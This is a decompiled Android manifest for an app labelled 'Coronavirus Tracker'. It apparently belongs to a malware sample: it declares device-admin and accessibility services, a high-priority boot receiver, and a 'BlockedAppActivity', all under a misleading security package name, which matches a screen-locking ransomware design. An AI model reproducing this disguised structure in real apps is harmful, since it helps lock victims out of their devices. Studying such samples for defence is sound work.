<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="29" android:compileSdkVersionCodename="10" package="com.device.security" platformBuildVersionCode="29" platformBuildVersionName="10">
	<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="29" />
	<uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
	<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
	<uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
	<application android:theme="resourceId:0x7f0d0005" android:label="Coronavirus Tracker" android:icon="res/mipmap-xxxhdpi-v4/ic_launcher.png" android:name="com.device.security.MyApplication" android:allowBackup="true" android:largeHeap="true" android:supportsRtl="true" android:roundIcon="res/mipmap-xxxhdpi-v4/ic_launcher_round.png" android:appComponentFactory="androidx.core.app.CoreComponentFactory">
		<activity android:name="com.device.security.activities.MainActivity" android:excludeFromRecents="true">
			<intent-filter>
				<action android:name="android.intent.action.MAIN" />
				<category android:name="android.intent.category.LAUNCHER" />
			</intent-filter>
		</activity>
		<activity android:theme="@android:style/Theme.Panel" android:name="com.device.security.activities.StartServiceActivity" android:excludeFromRecents="false" android:launchMode="singleTop" />
		<activity android:theme="resourceId:0x7f0d0108" android:label="" android:icon="resourceId:0x106000d" android:name="com.device.security.activities.BlockedAppActivity" android:excludeFromRecents="true" android:screenOrientation="portrait" android:windowSoftInputMode="0x2" />
		<service android:name="com.device.security.services.ForegroundAppService" android:enabled="true" />
		<receiver android:name="com.device.security.receiver.ActivateDeviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
			<intent-filter>
				<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
				<action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
			</intent-filter>
			<meta-data android:name="android.app.device_admin" android:resource="res/xml/device_admin_sample.xml" />
		</receiver>
		<receiver android:name="com.device.security.receiver.RebootReceiver">
			<intent-filter android:priority="999">
				<action android:name="android.intent.action.BOOT_COMPLETED" />
			</intent-filter>
		</receiver>
		<service android:name="com.device.security.accessibility.AppAccessibilityService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:enabled="true" android:exported="false">
			<intent-filter>
				<action android:name="android.accessibilityservice.AccessibilityService" />
			</intent-filter>
			<meta-data android:name="android.accessibilityservice" android:resource="res/xml/accessibility_service_config.xml" />
		</service>
	</application>
</manifest>
